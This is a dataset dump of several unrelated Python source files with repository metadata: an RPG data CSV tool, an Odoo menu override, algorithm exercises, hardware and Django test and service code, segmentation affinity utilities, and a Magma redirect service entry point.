0\n while i < len(temp):\n if temp[i:i+2] == '\\\\n':\n ret += '\\n'\n i += 2\n else:\n try:\n if temp[i] == '\\\\':\n ret += chr(int(temp[i+1:i+4]))\n i += 3\n else:\n ret += temp[i]\n except ValueError:\n ret += temp[i]\n i += 1\n return ret\n\ndef uniquify_strings(strings, template):\n seen = set()\n ret = []\n for namei, name in enumerate(strings):\n if name is None:\n ret.append(None)\n continue\n if len(name) == 0:\n ret.append(template % namei)\n continue\n name_ = name\n for i in itertools.count(1):\n if name_ not in seen:\n break\n name_ = name + str(i)\n seen.add(name_)\n ret.append(name_)\n return ret\n \n\ndef field_descriptor(dtype, name):\n \"\"\"\n Given a (possibly compound) numpy dtype, return a (header, decoder, encoder) tuple for manipulating a flattened representation.\n\n Each field is flattened to N primitives (eg integers, strings).\n A header is a list of N (sub)field names.\n A decoder takes a field of an ndarray of type 'dtype' and returns a list of N ints/floats/strings\n An encoder has signature encoder(dest, subfield, src)\n where * 'dest' is a data field (either 0 dimensional ndarray of type 'dtype', or a regular\n array if 'dtype' is an array)\n * 'subfield' is an index in range(0, N), usually ignored\n * 'src' is a string, a single cell from a csv file\n and converts and writes 'src' into 'dest'\n\n Note: The flattening is similar to flatten_dtype in ohrrpgce.py.\n \"\"\"\n ty = dtype #[name]\n if ty.isbuiltin:\n # Simple integer/float\n def decoder(src):\n return [src]\n def encoder(dest, subfield, src):\n # 
dereference\n            dest[()] = src\n        header = [name]\n\n    elif ty.kind == 'S':\n        # Raw string (as in textboxes)\n        def decoder(src):\n            return [escape_string(str(src))]\n        def encoder(dest, subfield, src):\n            dest[()] = unescape_string(src)\n        header = [name]\n\n    elif len(ty):\n        # Compound field\n        if ty.names[0] == 'length':\n            # it's a string\n            if ty.names[1] == 'value':\n                # fvstr\n                def decoder(src):\n                    return [escape_string(get_str8(src))]\n                def encoder(dest, index, src):\n                    # TODO: warn if truncated\n                    set_str8(dest, unescape_string(src))\n            else:\n                # vstr2 or funky 4 byte length variant\n                def decoder(src):\n                    return [escape_string(get_str16(src))]\n                def encoder(dest, index, src):\n                    # TODO: warn if truncated\n                    set_str16(dest, unescape_string(src))\n            header = [name]\n        else:\n            # Not primitive; recurse on subfields\n            headers, decoders, encoders = list(zip(*\n                [field_descriptor(ty[subfield], subfield) for subfield in ty.names]\n            ))\n\n            def decoder(src):\n                ret = []\n                for i, d in enumerate(decoders):\n                    ret.extend(d(src[i]))\n                return ret\n            def encoder(dest, index, src):\n                for i, h in enumerate(headers):\n                    if index < len(h):\n                        field = ty.names[i]\n                        encoders[i](dest[field], index, src)\n                        break\n                    index -= len(h)\n\n            header = [name + ' ' + header for header in concatenate(headers)]\n    \n    elif len(ty.shape):\n        # Array\n        if len(ty.shape) == 1:\n            _header, _decoder, _encoder = field_descriptor(ty.base, '')\n        else:\n            subdtype = np.dtype((ty.base, ty.shape[1:]))\n            _header, _decoder, _encoder = field_descriptor(subdtype, '')\n        def decoder(src):\n            return concatenate(_decoder(a) for a in src)\n        def encoder(dest, index, src):\n            field_len = len(_header)\n            newindex = index // field_len\n            if len(ty.shape) == 1:\n                reference = dest[newindex:newindex+1].reshape(())\n            else:\n                reference = dest[newindex]\n            _encoder(reference, index % field_len, src)\n        header = concatenate([['%s %d%s' % (name, i, piece) for piece in _header] for i in range(ty.shape[0])])\n\n    else:\n        print(repr(ty))\n        assert False\n\n    return header, decoder, encoder\n\ndef bitset_array(bitname_list = None):\n    \"\"\"\n    field_descriptor override for arrays of bits (see field_descriptor)\n\n    If bitnames is None, then the bitsets are exported as a comma delimited\n    string of IDs of set bits, eg. '1,3,13'\n    If bitnames is an array, each set bit is looked up in the array, and the\n    results joined with commas.\n    Bits with no name, or off the end of 'bitnames', are ignored: neither\n    exported nor changed on import.\n    \"\"\"\n    def descriptor(dtype, name):\n        assert dtype.base == np.uint8\n        assert len(dtype.shape) == 1\n        numbits = dtype.shape[0] * 8\n        bitnames = bitname_list\n        if bitnames is not None:\n            assert len(bitnames) <= numbits\n            numbits = len(bitnames)\n        else:\n            bitnames = [str(i) for i in range(numbits)]\n        inverse_map = dict((name, i) for i, name in enumerate(bitnames))\n        # clearmask marks the named bits, which get cleared and then re-imported; unnamed bits are kept as-is\n        clearmask = np.zeros((), dtype = dtype)\n        for i, bname in enumerate(bitnames):\n            if bname:\n                clearmask[i // 8] |= 1 << (i % 8)\n\n        def decoder(src):\n            bitvec = 0\n            unsigned = src.view(np.uint8)\n            for i, n in enumerate(src):\n                bitvec += int(n) << (i * 8)\n            ret = []\n            for i in range(numbits):\n                if bitnames[i] and bitvec & (1 << i):\n                    ret.append(bitnames[i])\n            return [escape_string(','.join(ret))]\n\n        def encoder(dest, subfield, src):\n            dest &= ~clearmask\n            bits = unescape_string(src).split(',')\n            if bits == ['']:\n                bits = []\n            for bname in bits:\n                try:\n                    bit = inverse_map[bname]\n                except KeyError:\n                    raise ValueError(\"Bitname %s in bitsets field %s is not recognised\" % (bname, name))\n                dest[bit // 8] |= 1 << (bit % 8)\n\n        header = [name]\n        return header, decoder, encoder\n    return descriptor\n\ndef lump2csv(lump, fields, overrides):\n    \"\"\"\n    Returns a table in csv format containing a subset of the fields/columns and all the records/rows of a lump.\n\n    'lump' is an ndarray, and fields is a list of field names of the lump's dtype.\n    \"\"\"\n    fields = [name for name in fields if not name.startswith(\"unused\")]\n    headers2, decoders = [], []\n    for name in fields:\n        if name in overrides:\n            headers, decoder, encoder = overrides[name](lump.dtype[name], name)\n        else:\n            headers, decoder, encoder = field_descriptor(lump.dtype[name], name)\n        headers2.extend(headers)\n        decoders.append(decoder)\n    ret = [','.join(headers2)]\n    for item in lump:\n        stuff = []\n        for i, name in enumerate(fields):\n            stuff.extend(decoders[i](item[name]))\n        ret.append(','.join(str(a) for a in stuff))\n\n    return '\\n'.join(ret)\n\ndef csv2lump(csv, lump, overrides):\n    \"\"\"\n    Parses a spreadsheet in csv format and writes into a ndarray of the right dtype.\n\n    'csv' is a string containing multiple lines where the first line contains column\n    headers, and the remaining lines are records starting at 0.\n    'lump' should have at least as many records as there are in 'csv'\n    \"\"\"\n    lines = csv.split('\\n')\n    present_headers = lines[0].split(',')\n    records = [line for line in lines[1:] if len(line) > 0]\n\n    if len(lump) != len(records):\n        raise ValueError(\"csv table has %d records, but file has %d records\" % (len(records), len(lump)))\n\n    headers, encoders = [], []\n    for name in lump.dtype.names:\n        if name in overrides:\n            _headers, _decoder, _encoder = overrides[name](lump.dtype[name], name)\n        else:\n            _headers, _decoder, _encoder = field_descriptor(lump.dtype[name], name)\n        headers.extend(_headers)\n        encoders.extend( [(_encoder, name, i) for i in range(len(_headers))] )\n    print()\n\n    encoder_list = []\n\n    for header in present_headers:\n        if header == '':\n            encoder_list.append(None)\n            continue\n        try:\n            encoder_num = headers.index(header.lower())\n        except ValueError:\n            raise ValueError(\"Could not recognise the column named '\" + header + \"'\")\n        
encoder_list.append(encoders[encoder_num])\n\n print(\"Writing into records 0 to %d (out of %d existing)\" % (len(records) - 1, len(lump)))\n\n for recnum, csv_record in enumerate(records):\n # create a 0-dimensional reference to the record.\n # lump[recnum] returns an np.void object which is a *copy* of the original data\n record = lump[recnum:recnum+1].reshape(())\n\n fields = escaped_split(csv_record, ',')\n for i, datum in enumerate(fields):\n temp = encoder_list[i]\n if temp is None:\n continue\n encoder, fieldname, index = temp\n encoder(record[fieldname], index, datum)\n\n\nif __name__ == '__main__':\n\n def usage():\n print(\"Usage:\")\n print(\" \" + sys.argv[0] + \" --type --export \")\n print(\" \" + sys.argv[0] + \" --type --import \")\n print()\n print(\" Where is one of items, attacks, enemies, heroes, textboxes\")\n print()\n sys.exit(1)\n\n lumpnames = {'items': 'itm', 'enemies': 'dt1', 'heroes': 'dt0', 'attacks': 'attack.full', 'textboxes': 'say'}\n binsizes = {'items': 'item', 'enemies': 'enemy', 'heroes': 'hero', 'attacks': 'attack', 'textboxes': 'say'}\n\n if len(sys.argv) != 6:\n print(\"Not enough arguments\")\n usage()\n\n if sys.argv[1] != '--type' or sys.argv[2] not in lumpnames:\n print(\"Type not understood\")\n usage()\n lumpid = sys.argv[2]\n\n if sys.argv[3] == '--export':\n export = True\n mode = 'w'\n elif sys.argv[3] == '--import':\n export = False\n mode = 'r+'\n else:\n print(\"Specify --import or --export\")\n usage()\n\n if not os.path.isdir(sys.argv[4]):\n print(sys.argv[4] + \" is not a directory\")\n usage()\n\n rpg = RPGDir(sys.argv[4], 'r+')\n iofile = open(sys.argv[5], mode)\n\n def unsupported(msg, indicator, supported):\n msg += \" (%d; expected %d)\" % (indicator, supported)\n if indicator < supported:\n print(msg + \" The RPG file needs to be updated.\")\n else:\n print(msg + \" nohrio needs to be updated.\")\n sys.exit(1)\n \n rpgformat = rpg.data('gen').version\n if rpgformat not in (16, 17, 18, 19, 20, 21):\n unsupported(\"RPG file format not supported.\", rpgformat, 21)\n\n if rpgformat >= 19 and lumpid == 'heroes':\n if export:\n print(\"Warning: newer RPG format; reading old hero data. 
Missing some data fields, and re-importing hero data into this game is not supported.\")\n else:\n print(\"Importing heroes into newer RPG files is not supported; will not be until a total tabulate.py rewrite.\")\n sys.exit(1)\n\n if binsizes[lumpid]:\n lumpsize = dt[lumpnames[lumpid]].itemsize\n binsize = rpg.binsize[binsizes[lumpid]]\n if lumpid == 'attacks':\n binsize += 80\n if binsize != lumpsize: #ump.dtype.itemsize:\n unsupported(\"File format not supported: wrong binsize.\", binsize, lumpsize)\n\n lump = rpg.data(lumpnames[lumpid])\n\n # If you're interested in all fields\n fields = lump.dtype.names\n\n overrides = {}\n if lumpid == 'items':\n dt0 = rpg.data('dt0')\n hero_names = uniquify_strings([get_str16(n) for n in dt0['name']], 'hero %d')\n overrides = {'equippableby': bitset_array(hero_names)}\n fields = [n for n in fields if n != 'bitsets'] # No bitsets are used\n\n if lumpid == 'heroes':\n bitnames = [None] * 24 + ['rename on add', 'renameable', 'hide empty lists']\n overrides = {'bitsets': bitset_array(bitnames)}\n\n if lumpid == 'enemies':\n bitnames = uniquify_strings([None] * 54 + [''] * 11, '%d') # hide some, default names for the rest\n overrides = {'bitsets': bitset_array(bitnames)}\n\n if lumpid == 'attacks':\n bitnames = uniquify_strings([''] * 64, '%d') # default names\n bitnames2 = uniquify_strings([''] * 128, '%d')\n overrides = {'bitsets1': bitset_array(bitnames), 'bitsets2': bitset_array(bitnames2)}\n\n if lumpid == 'textboxes':\n bitnames = uniquify_strings([''] * 8, '%d') # default names\n overrides = {'choicebitsets': bitset_array(bitnames)}\n\n if 0 and lumpid == 'items':\n # Only interested in some fields...\n fields = (\n 'name',\n 'info',\n 'value',\n 'attack',\n 'weaponattack',\n 'equippable',\n # 'teach',\n # 'oobuse',\n 'weaponpic',\n 'weaponpal',\n 'bonuses',\n # 'equippableby',\n # 'bitsets',\n 'consumability',\n # 'own_tag',\n # 'in_inventory_tag',\n # 'equipped_tag',\n # 'equippedby_active_tag',\n # 'frame2handle',\n # 'frame1handle',\n # 'elemdmg'\n )\n\n if export:\n iofile.write(lump2csv(lump, fields, overrides))\n else:\n #print lump.md5()\n # Operate on a copy so that nothing is done if an exception occurs\n lump2 = np.copy(lump)\n csv2lump(iofile.read(), lump2, overrides)\n lump[:] = lump2[:]\n #print lump.md5()\n","repo_name":"ohrrpgce/nohrio","sub_path":"3rdparty/tabulate.py","file_name":"tabulate.py","file_ext":"py","file_size_in_byte":15549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"22391591041","text":"# -*- coding: utf-8 -*-\n# (C) 2018 Smile ()\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, models, tools\n\n\nclass IrUiMenu(models.Model):\n _inherit = 'ir.ui.menu'\n\n @api.model\n @tools.ormcache('frozenset(self.env.user.groups_id.ids)', 'debug')\n def _visible_menu_ids(self, debug=False):\n \"\"\" Hide hidden menus in navbar search provided by module\n web_responsive.\n Add a special case for module base_technical_features, forcing\n the display of technical menus hidden by default if user hasn't\n enable debug mode.\n \"\"\"\n if not debug:\n debug = self.env.user.has_group(\n 'base_technical_features.group_technical_features')\n visible_menu_ids = super(IrUiMenu, self)._visible_menu_ids(debug)\n groups = self.env.user.groups_id\n if not debug:\n groups = groups - self.env.ref('base.group_no_one')\n for menu in self.browse(visible_menu_ids):\n parent = menu.parent_id\n while parent:\n if parent.groups_id and not 
(parent.groups_id & groups):\n                    visible_menu_ids.remove(menu.id)\n                    break\n                parent = parent.parent_id\n        return visible_menu_ids\n","repo_name":"detian08/bsp_addons","sub_path":"smile/smile_web/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} {"seq_id":"36415844238","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def hasCycle(self, head: Optional[ListNode]) -> bool:\n        temp = head\n        count = 0\n        \n        while temp:\n            temp = temp.next\n            count += 1\n            if count >= 10001:\n                return True\n        \n        return False\n        ","repo_name":"eyosiasbitsu/Competitive-programming-A2SV","sub_path":"After BootCamp/week6/141-linked-list-cycle/141-linked-list-cycle.py","file_name":"141-linked-list-cycle.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} {"seq_id":"5308848330","text":"import sys\n# crane weight limits / box weights\n# 6 8 9\n# 2 2 4 5 7\n\n# 3\n# 2 3 9\n# 5\n# 2 2 4 5 7\nn = int(input())\ncranes = list(map(int, input().split()))\nm = int(input())\nboxes = list(map(int, input().split()))\n\n\ndef solution1():\n    cranes.sort(reverse=True)\n    boxes.sort(reverse=True)\n\n    turn = 0\n    # max crane capacity < heaviest box\n    if cranes[0] < boxes[0]:\n        print(-1)\n    else:\n        # repeat until every box has been handled\n        while boxes:\n            # use each crane once per turn\n            for crane in cranes:\n                # if boxes remain\n                if boxes:\n                    # starting from the heaviest box, find one this crane can move\n                    idx = 0\n\n                    # index errors in this while loop caused a lot of lost debugging time\n                    while crane < boxes[idx]:\n                        if idx >= len(boxes)-1:\n                            break\n                        idx += 1\n                    # load the box onto the ship\n                    if crane >= boxes[idx]:\n                        boxes.remove(boxes[idx])\n                else:\n                    break\n\n            # one unit of time\n            turn += 1\n        print(turn)\n\n\ndef solution2():\n    if max(cranes) < max(boxes):\n        print(-1)\n        sys.exit()\n\n    # index of the box each crane should try next\n    crane_positions = [0]*n\n    # whether each box has been moved\n    check_box_moved = [False]*m\n    cranes.sort(reverse=True)\n    boxes.sort(reverse=True)\n\n    result = 0\n    count = 0\n\n    while True:\n        if count == len(boxes): # all boxes have been moved\n            break\n        for i in range(n):\n            while crane_positions[i] < len(boxes): # current crane scans all box positions\n                # repeat until it meets a box that is not yet moved and that it can lift\n                if not check_box_moved[crane_positions[i]] and cranes[i] >= boxes[crane_positions[i]]:\n                    check_box_moved[crane_positions[i]] = True\n                    crane_positions[i] += 1\n                    count += 1\n                    break\n                crane_positions[i] += 1 # after moving, point to the next box position\n        result += 1\n    print(result)\n\n\nsolution2()\n","repo_name":"louisuss/Algorithms-Code-Upload","sub_path":"Python/FastCampus/greedy/1092++.py","file_name":"1092++.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"5773987035","text":"import os\nimport random\n\nimport pytest\n\nfrom tests.instructions import *\nfrom tests.setup_tests import Config, init_waveforms, run_simulation\n\nconfig = Config(\n    HDLFILES=[\"src/multi_cycle_cpu/datapath/registerfile.sv\"],\n    TOPLEVEL=\"registerfile\",\n    WORK_DIR=\"src/multi_cycle_cpu/datapath/\",\n    TEST_DIR=\"tests/multi_cycle_cpu/datapath/registerfile\",\n)\n\ninit_waveforms(config)\n\nwaveform_file = config.TOPLEVEL + \"_d0_{}_d1_{}.vcd\"\n\n\ndef set_signals(we, a1, a2, a3, wd3):\n\n    return {\n        \"we\": str(we),\n        \"a1\": str(a1),\n        \"a2\": str(a2),\n        \"a3\": str(a3),\n        \"wd3\": str(wd3),\n    }\n\n\n@pytest.mark.parametrize(\"we\", [0, 1])\n@pytest.mark.parametrize(\"a1\", [0, 
1])\n@pytest.mark.parametrize(\"a2\", [0, 1])\n@pytest.mark.parametrize(\"a3\", [0, 1])\n@pytest.mark.parametrize(\"wd3\", [0, 1])\ndef test_registerfile(we, a1, a2, a3, wd3):\n run_simulation(\n config, \"test_registerfile\", waveform_file, set_signals(we, a1, a2, a3, wd3)\n )\n","repo_name":"ljhahne/multi_cycle_riscv_cpu","sub_path":"tests/multi_cycle_cpu/datapath/registerfile/test_registerfile.py","file_name":"test_registerfile.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8901542430","text":"from django.db.models import QuerySet\r\n\r\nfrom config.constants.api_const import HttpStatus, ErrorKeys, ErrorResponse\r\nfrom src.account.value_objects import UserId\r\nfrom src.amthauer.models import Component, Session, ParticipantAnswer, Participant, ScoreResult\r\nfrom src.amthauer.schemas import SessionSchemaIn, ParticipantAnswerSchemaIn, ParticipantSchemaIn\r\nfrom src.common.schemas.common_schemas import ResponseSchema\r\n\r\n\r\ndef create_session(session: SessionSchemaIn) -> tuple[\r\n int, QuerySet | Session] | \\\r\n tuple[int, ResponseSchema]:\r\n\r\n try:\r\n new_session: QuerySet | Session = Session(\r\n participant_id=session.participant,\r\n test_date=session.test_date,\r\n test_location=session.test_location,\r\n start_time=session.start_time,\r\n end_time=session.end_time,\r\n )\r\n new_session.save()\r\n print('------------------------------')\r\n print(new_session)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_session\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef update_session_by_id(session_id: int, session_schema: SessionSchemaIn) -> tuple[\r\n int, QuerySet | Session] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n existed_session: QuerySet | Session = Session.objects.get(id=session_id)\r\n for attr, value in session_schema.dict(exclude_unset=True).items():\r\n setattr(existed_session, attr, value)\r\n existed_session.save()\r\n return HttpStatus.OK.value, existed_session\r\n except Session.DoesNotExist as e:\r\n print(e)\r\n return HttpStatus.NOT_FOUND.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.NOT_EXISTING_DB_ENTRY_ERROR.value}\r\n )\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.SHOW_ONE_DB_ENTRY_ERROR.value}\r\n )\r\n\r\n\r\ndef create_participant_answer(participant_answer_schema: ParticipantAnswerSchemaIn) -> tuple[\r\n int, QuerySet | ParticipantAnswer] | \\\r\n tuple[int, ResponseSchema]:\r\n try:\r\n new_participant_answer: QuerySet | ParticipantAnswer = ParticipantAnswer(\r\n session_id=participant_answer_schema.session,\r\n component_id=participant_answer_schema.component,\r\n question_id=participant_answer_schema.question,\r\n answer_id=participant_answer_schema.answer,\r\n time_taken_answer_seconds=participant_answer_schema.time_taken_answer_seconds,\r\n )\r\n new_participant_answer.save()\r\n print('------------------------------')\r\n print(new_participant_answer)\r\n print('------------------------------')\r\n return HttpStatus.OK.value, new_participant_answer\r\n except Exception as e:\r\n print(e)\r\n return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n 
)\r\n\r\n\r\ndef create_participant(user_id: UserId, participant_schema: ParticipantSchemaIn) -> tuple[\r\n    int, QuerySet | Participant] | \\\r\n        tuple[int, ResponseSchema]:\r\n    try:\r\n        new_participant: QuerySet | Participant = Participant(\r\n            user_id=user_id,\r\n            first_name=participant_schema.first_name,\r\n            last_name=participant_schema.last_name,\r\n            gender=participant_schema.gender,\r\n            date_of_birth=participant_schema.date_of_birth,\r\n            email=participant_schema.email,\r\n            phone_number=participant_schema.phone_number\r\n        )\r\n        new_participant.save()\r\n        print('------------------------------')\r\n        print(new_participant)\r\n        print('------------------------------')\r\n        return HttpStatus.OK.value, new_participant\r\n    except Exception as e:\r\n        print(e)\r\n        return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n            **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n        )\r\n\r\n\r\ndef create_score_result(score_result_schema: ParticipantSchemaIn) -> tuple[\r\n    int, QuerySet | ScoreResult] | \\\r\n        tuple[int, ResponseSchema]:\r\n    try:\r\n        new_score_result: QuerySet | ScoreResult = ScoreResult(\r\n            session_id=score_result_schema.session,\r\n            raw_score=score_result_schema.raw_score,\r\n            standardized_score=score_result_schema.standardized_score,\r\n            percentile_rank=score_result_schema.percentile_rank,\r\n            time_taken_seconds=score_result_schema.time_taken_seconds,\r\n        )\r\n        new_score_result.save()\r\n        print('------------------------------')\r\n        print(new_score_result)\r\n        print('------------------------------')\r\n        return HttpStatus.OK.value, new_score_result\r\n    except Exception as e:\r\n        print(e)\r\n        return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n            **{ErrorKeys.MESSAGE.value: ErrorResponse.CREATE_NEW_DB_ENTRY_ERROR.value}\r\n        )\r\n\r\n\r\ndef update_participant_by_id(participant_id: int, participant_schema: ParticipantSchemaIn) -> tuple[\r\n    int, QuerySet | Participant] | \\\r\n        tuple[int, ResponseSchema]:\r\n    try:\r\n        existed_participant: QuerySet | Participant = Participant.objects.get(id=participant_id)\r\n        for attr, value in participant_schema.dict(exclude_unset=True).items():\r\n            setattr(existed_participant, attr, value)\r\n        existed_participant.save()\r\n        return HttpStatus.OK.value, existed_participant\r\n    except Participant.DoesNotExist as e:\r\n        print(e)\r\n        return HttpStatus.NOT_FOUND.value, ResponseSchema(\r\n            **{ErrorKeys.MESSAGE.value: ErrorResponse.NOT_EXISTING_DB_ENTRY_ERROR.value}\r\n        )\r\n    except Exception as e:\r\n        print(e)\r\n        return HttpStatus.BAD_REQUEST.value, ResponseSchema(\r\n            **{ErrorKeys.MESSAGE.value: ErrorResponse.SHOW_ONE_DB_ENTRY_ERROR.value}\r\n        )\r\n","repo_name":"ivanshevchenko1994/amthauer-test","sub_path":"src/amthauer/services/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"33613827304","text":"import numpy as np\r\n\r\n\r\ndef gen_affs(map1, map2=None, dir=0, shift=1, padding=True, background=False):\r\n    if dir == 0 and map2 is None:\r\n        raise AttributeError('map2 is none')\r\n    map1 = map1.astype(np.float32)\r\n    h, w = map1.shape\r\n    if dir == 0:\r\n        map2 = map2.astype(np.float32)\r\n    elif dir == 1:\r\n        map2 = np.zeros_like(map1, dtype=np.float32)\r\n        map2[shift:, :] = map1[:h-shift, :]\r\n    elif dir == 2:\r\n        map2 = np.zeros_like(map1, dtype=np.float32)\r\n        map2[:, shift:] = map1[:, :w-shift]\r\n    else:\r\n        raise AttributeError('dir must be 0, 1 or 2')\r\n    dif = map2 - map1\r\n    out = 
dif.copy()\r\n out[dif == 0] = 1\r\n out[dif != 0] = 0\r\n if background:\r\n out[map1 == 0] = 0\r\n out[map2 == 0] = 0\r\n if padding:\r\n if dir == 1:\r\n # out[:shift, :] = (map1[:shift, :] > 0).astype(np.float32)\r\n out[:shift, :] = out[2*shift:shift:-1, :]\r\n if dir == 2:\r\n # out[:, :shift] = (map1[:, :shift] > 0).astype(np.float32)\r\n out[:, :shift] = out[:, 2*shift:shift:-1]\r\n else:\r\n if dir == 1:\r\n out[:shift, :] = 0\r\n if dir == 2:\r\n out[:, :shift] = 0\r\n return out\r\n\r\ndef gen_affs_mutex(map1, map2, shift=0, padding=True, background=False):\r\n assert len(shift) == 3, 'the len(shift) must be 3'\r\n h, w = map1.shape\r\n map1 = map1.astype(np.float32)\r\n map2 = map2.astype(np.float32)\r\n\r\n if shift[1] <= 0 and shift[2] <= 0:\r\n map1[-shift[1]:, -shift[2]:] = map1[:h+shift[1], :w+shift[2]]\r\n elif shift[1] <= 0 and shift[2] > 0:\r\n map1[-shift[1]:, :w-shift[2]] = map1[:h+shift[1], shift[2]:]\r\n elif shift[1] > 0 and shift[2] <= 0:\r\n map1[:h-shift[1], -shift[2]:] = map1[shift[1]:, :w+shift[2]]\r\n elif shift[1] > 0 and shift[2] > 0:\r\n map1[:h-shift[1], :w-shift[2]] = map1[shift[1]:, shift[2]:]\r\n else:\r\n pass\r\n\r\n dif = map1 - map2\r\n out = dif.copy()\r\n out[dif == 0] = 1\r\n out[dif != 0] = 0\r\n if background:\r\n out[map1 == 0] = 0\r\n out[map2 == 0] = 0\r\n if padding:\r\n if shift[1] < 0:\r\n out[:-shift[1], :] = out[-2*shift[1]:-shift[1]:-1, :]\r\n elif shift[1] > 0:\r\n out[h-shift[1]:, :] = out[h-shift[1]-2:h-2*shift[1]-2:-1, :]\r\n else:\r\n pass\r\n if shift[2] < 0:\r\n out[:, :-shift[2]] = out[:, -2*shift[2]:-shift[2]:-1]\r\n elif shift[2] > 0:\r\n out[:, w-shift[2]:] = out[:, w-shift[2]-2:w-2*shift[2]-2:-1]\r\n else:\r\n pass\r\n else:\r\n if shift[1] < 0:\r\n out[:-shift[1], :] = 0\r\n elif shift[1] > 0:\r\n out[h-shift[1]:, :] = 0\r\n else:\r\n pass\r\n if shift[2] < 0:\r\n out[:, :-shift[2]] = 0\r\n elif shift[2] > 0:\r\n out[:, w-shift[2]:] = 0\r\n else:\r\n pass\r\n return out\r\n\r\ndef gen_affs_3d(labels, shift=1, padding=True, background=False):\r\n assert len(labels.shape) == 3, '3D input'\r\n out = []\r\n for i in range(labels.shape[0]):\r\n if i == 0:\r\n if padding:\r\n # affs0 = (labels[0] > 0).astype(np.float32)\r\n affs0 = gen_affs(labels[i], labels[i+1], dir=0, shift=shift, padding=padding, background=background)\r\n else:\r\n affs0 = np.zeros_like(labels[0], dtype=np.float32)\r\n else:\r\n affs0 = gen_affs(labels[i-1], labels[i], dir=0, shift=shift, padding=padding, background=background)\r\n affs1 = gen_affs(labels[i], None, dir=1, shift=shift, padding=padding, background=background)\r\n affs2 = gen_affs(labels[i], None, dir=2, shift=shift, padding=padding, background=background)\r\n affs = np.stack([affs0, affs1, affs2], axis=0)\r\n out.append(affs)\r\n out = np.asarray(out, dtype=np.float32)\r\n out = np.transpose(out, (1, 0, 2, 3))\r\n return out\r\n\r\ndef gen_affs_mutex_3d(labels, shift=[[-1, 0, 0], [0, -1, 0], [0, 0, -1]], padding=True, background=False):\r\n affs = []\r\n for shift_k in shift:\r\n affs_k = []\r\n for i in range(labels.shape[0]):\r\n if shift_k[0] != 0:\r\n if i == 0:\r\n if padding:\r\n temp = gen_affs_mutex(labels[0], labels[1], shift=shift_k, padding=padding, background=background)\r\n else:\r\n temp = np.zeros_like(labels[0], dtype=np.float32)\r\n else:\r\n temp = gen_affs_mutex(labels[i-1], labels[i], shift=shift_k, padding=padding, background=background)\r\n else:\r\n temp = gen_affs_mutex(labels[i], labels[i], shift=shift_k, padding=padding, background=background)\r\n 
affs_k.append(temp)\r\n affs.append(affs_k)\r\n affs = np.asarray(affs)\r\n return affs\r\n","repo_name":"ydchen0806/PromptTTA","sub_path":"utils/affinity_ours.py","file_name":"affinity_ours.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40688602513","text":"import logging\nimport threading\n\nfrom lte.protos.mconfig import mconfigs_pb2\nfrom magma.common.sentry import sentry_init\nfrom magma.common.service import MagmaService\nfrom magma.configuration.service_configs import get_service_config_value\nfrom magma.redirectd.redirect_server import run_flask\n\n\ndef main():\n \"\"\"\n main() for redirectd. Starts the server threads.\n \"\"\"\n service = MagmaService('redirectd', mconfigs_pb2.RedirectD())\n\n # Optionally pipe errors to Sentry\n sentry_init(service_name=service.name, sentry_mconfig=service.shared_mconfig.sentry_config)\n\n redirect_ip = get_service_config_value(\n 'pipelined',\n 'bridge_ip_address', None,\n )\n if redirect_ip is None:\n logging.error(\"ERROR bridge_ip_address not found in pipelined config\")\n service.close()\n return\n\n http_port = service.config['http_port']\n exit_callback = get_exit_server_thread_callback(service)\n run_server_thread(run_flask, redirect_ip, http_port, exit_callback)\n\n # Run the service loop\n service.run()\n\n # Cleanup the service\n service.close()\n\n\ndef get_exit_server_thread_callback(service):\n def on_exit_server_thread():\n service.StopService(None, None)\n\n return on_exit_server_thread\n\n\ndef run_server_thread(target, ip, port, exit_callback):\n \"\"\" Start redirectd service server thread \"\"\"\n thread = threading.Thread(\n target=target,\n args=(ip, port, exit_callback),\n )\n thread.daemon = True\n thread.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"magma/magma","sub_path":"lte/gateway/python/magma/redirectd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"6"} +{"seq_id":"39414016064","text":"# coding: utf-8\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom sklearn import linear_model\n\nimport statistics\nimport os\nimport pyCellLineage as myPackage\n\nmodes = ['last']\nconds = ['glc_rich', 'glc_poor']\nroot = os.path.join(os.path.dirname(myPackage.__file__), 